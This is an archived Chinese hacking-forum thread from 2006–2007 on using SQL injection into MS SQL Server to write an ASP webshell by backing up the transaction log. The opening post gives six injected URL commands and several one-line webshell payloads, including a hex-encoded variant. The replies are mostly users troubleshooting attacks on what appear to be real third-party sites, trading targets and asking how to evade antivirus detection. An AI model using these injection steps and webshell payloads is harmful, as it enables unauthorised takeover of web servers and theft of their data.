邪恶八进制信息安全团队技术讨论组 » 技术讨论{ Technique Discussions } » [讨论]log备份的总结 [查看完整版本]

zhangyuan 2006-10-30 13:09

[讨论]log备份的总结

议题作者：zhangyuan
信息来源：邪恶八进制信息安全团队（[url]www.eviloctal.com[/url]）

当SQL注入是得到DB权限时候，接下来可以做的工作很多，象找管理员密码，后台管理这些都可以帮助你拿到WEBSHELL,但是这篇文章讲的是log备份,LOG备份出来的小马的体积小,而且备份的成功的可性很大，所以是我作为对DB权限的第一种试探方法.
但是在LOG备份中,我们经常会遇到一些很让我们头痛的问题,那就是闭合的问题，我在这里做个总结，也
好让我们对不能闭合的方法有一个全面的了解.
1.先介绍下LOG备份，这个相信大家都很熟悉了，我还是习惯在IE里直接提交，返回正常的页面就说这一步的操作就成功了，如果没有返回正常的页面，我们就可以根据IE返回的错误来找他的原因.(这里说下要将IE的错误提示给打开),LOG的格式如下所示:
[url]http://www.site.com/xx.asp?id=xxx;alter[/url] database databasename set RECOVERY FULL
[url]http://www.site.com/xx.asp?id=xxx;create[/url] table cmd (a image)--
[url]http://www.site.com/xx.asp?id=xxx;backup[/url] log databasename to disk = 'c:\cmd' with init
[url]http://www.site.com/xx.asp?id=xxx;insert[/url] into cmd (a) values (&#39;<%%25Execute(request("go"))%

%25>&#39;)--
[url]http://www.site.com/xx.asp?id=xxx;backup[/url] log databasename to disk = &#39;x:\xxx\xxx\asp1.asp&#39;--
[url]http://www.site.com/xx.asp?id=xxx;drop[/url] table cmd--

分为6步操作,最容易出错的就是第4步的操作，经常返回没有闭合的问题，下面就是一些我们可以将
values中的内容可以进行更换的方式,当我们的一种方式不行的话，就可以换另一种方式，当所有的方式
都换完了，没有什么好说的，要么就放弃，要么就换另一种方式继续，想列目录找数据库下载，后台.这
里就不多说了，可以提换的内容有:
a).<%%25Execute(request("go"))%%25>
b).<%Execute(request("go"))%>
c).%><%execute request("go")%><%
d).<script language=VBScript runat=server>execute request("sb")</Script>
e).<%25Execute(request("l"))%25>

2.LOG备份要注意的一些问题:
a).要注意你现在的机器是不是WEB主机,简单的方法就是翻他的目录，看有没有IIS安装的文件
b).当你确定你要找的确实是WEN主机时，就可以找他的站点目录了,这个也很重要，是步骤5的操作，如果备份到一个错误的目录，当然就没有办法访问了
c).备份成功后，你就可以试着用客户端去连接，这个地方也有人弄错，现在用的字段是go,你的客户端的
相关字段也为go
d).用ececute正常备份出来的是用错误提示的，当你的显示500错误时，请你将的IE错误提示打开，当显示
Microsoft VBScript 运行时错误 错误 &#39;800a000d&#39;

类型不匹配: &#39;execute&#39;
时候表示你已经成功了，连接吧!!
e).还有极端的时候你备份出来的一句话被杀(当你确定你确实是备份在WEB主机的对应目录是),你可以将

上面的VALUES字段中的值做几个大小写转换，一般是没有问题的..

3.因为这篇文章用了很多前辈的东西，不敢说是原创，只能算做是讨论，我会将我所知道的东西在以后的
日子里一一更新上去..谢谢!!
4.感谢各位前辈提出这么一个好方法否则就不会有这篇文章了..

felifan 2006-11-17 13:58

Microsoft VBScript 编译器错误 错误 &#39;800a03f6&#39;
缺少 &#39;End&#39;

/iisHelp/common/500-100.asp，行242

Microsoft OLE DB Provider for SQL Server 错误 &#39;80004005&#39;

超时已过期

/totalcar2.asp，行282


错在第3步上了

eocol 2006-11-17 14:13

[quote][b]引用第1楼[i]felifan[/i]于[i]2006-11-17 13:58[/i]发表的[/b]:
Microsoft VBScript 编译器错误 错误 &#39;800a03f6&#39;
缺少 &#39;End&#39;

/iisHelp/common/500-100.asp，行242

.......[/quote]
可以继续

zhangyuan 2006-11-17 14:38

[quote][b]引用第1楼[i]felifan[/i]于[i]2006-11-17 13:58[/i]发表的[/b]:
Microsoft VBScript 编译器错误 错误 &#39;800a03f6&#39;
缺少 &#39;End&#39;

/iisHelp/common/500-100.asp，行242

.......[/quote]

你的这个数据库太大，换个小点的试下..

felifan 2006-11-17 19:31

闹了半天 才想通 为什么失败 ！~~估计就是没有写的权限吧 明天在来 不信就K不了他 [s:75]

justcrack 2006-11-21 22:25

如果还失败可以考虑第4步改成<%eval request("yourpass")%>  [s:38]

felifan 2006-11-22 15:45

这次真的不行了
备份以后的ASP文件最下面出现

Microsoft VBScript 运行时错误 错误 &#39;800a000d&#39;

类型不匹配: &#39;execute&#39;

/dlgl/fe3.asp，行 29

我写的代码全部：
;alter database taxfreedb set RECOVERY FULL--
;create table cmd (a image)--
;backup log taxfreedb to disk = &#39;c:\Sammy&#39; with init--
;insert into cmd (a) values (&#39;<script language=VBScript runat=server>execute request("value")</Script>&#39;)--    //这里是因为我怀疑过滤了% 所以该的
;backup log taxfreedb to disk = &#39;D:\********\dlgl\fe3.asp&#39;
;drop table [cmd]--

felifan 2006-11-22 16:46

换了个站试验下 本来以为是我的一句话的问题那  结果发现换了1句话 问题还存在

zhangyuan 2006-11-22 17:18

谢谢楼上送站...免了我自己搞...

riigeaps 2006-11-28 12:46

类型不匹配: &#39;execute&#39;

有这样的提示应当是成功了可我还是连接不上一开始以为是客户端问题换了好几个多不行郁闷~！
(&#39;<%%25Execute(request("go"))%%25>&#39;)-- 我用的是这个一句话木马
有那位兄弟有那点的客户端告诉一下~！

fbll 2006-12-8 13:17

Microsoft OLE DB Provider for ODBC Drivers 錯誤 &#39;80040e14&#39;

[Microsoft][ODBC SQL Server Driver][SQL Server]關鍵字 &#39;and&#39; 附近的語法不正確。

/inforstation/inc/NewsDataRead.inc, 列58

第一句出这个怎么办呢

wangle 2006-12-13 00:04

大家帮我分析下吧
我执行到第二句的时候不成功
;create table cmd (a image)--
其他都可以 什么原因呢

shenlye 2006-12-27 21:22

;insert into cmd (a) values(0x3C25657865637574652072657175657374282276616C75652229253E)--

改成16进制就没事了吧
第2句。。。返回什么？
。。。。。。。最让我郁闷的事。。传马的时候出错。。
Server 对象 错误 &#39;ASP 0177 : 800401f3&#39;

Server.CreateObject 失败

/kb.asp，行 0

800401f3

七星 2007-1-14 14:22

如果是ACCESS碰到有未闭合的<%那该怎么办

无敌小龙 2007-1-18 14:55

还是能列web目录最好

偶以前碰到的：目录列不出来，cmdshell被删，又无法恢复，updata也没招...

风云逸剑 2007-5-11 12:49

Microsoft OLE DB Provider for SQL Server 錯誤 &#39;80040e14&#39;

Line 1: Incorrect syntax near &#39;\&#39;.

/mms.asp, 列99
我第三步错误如上！
是怎么回事？

yclmsy 2007-6-4 16:50

处理 URL 时服务器出错。请与系统管理员联系??????

xln28118 2007-6-4 17:02

关于一句话可以免杀么?大小变换还是怎么搞 我传上去的老是不见

沉渊 2007-6-19 15:53

回６楼的，你已经成功了，用客户端连接就行了
９楼的，这个错误提示跟用哪个客户端没关系，重要的是在服务端跟客户端里用一个参数名称
１０楼的，你那个应该是参数后面还有sql语句，注释掉就好
１１楼的，我估计可能是你弄的那个站已经被人搞过了，那人完了没檫ＰＰ，你看看数据库里面是不是已经有cmd这个表了。
１２楼的，可能是服务器上删除了asp的一些组件，用其他写入文件的函数试试，不行就没的玩了
１３楼的，遇到access根本没的玩，放弃吧
１５楼的，仔细检查下自己的语句写错没有，它报的是语法错误
１６楼的，服务器那边关闭了错误提示

咖啡爱可可 2007-6-21 20:48

Microsoft VBScript 编译器错误 错误 &#39;800a0408&#39;

无效字符

/te1.asp，行45

%eval(request("a")):response.end%
^

gghpop 2007-7-4 08:22

处理 URL 时服务器出错。请与系统管理员联系??????

查看完整版本: [讨论]log备份的总结

© 1999-2008 EvilOctal Security Team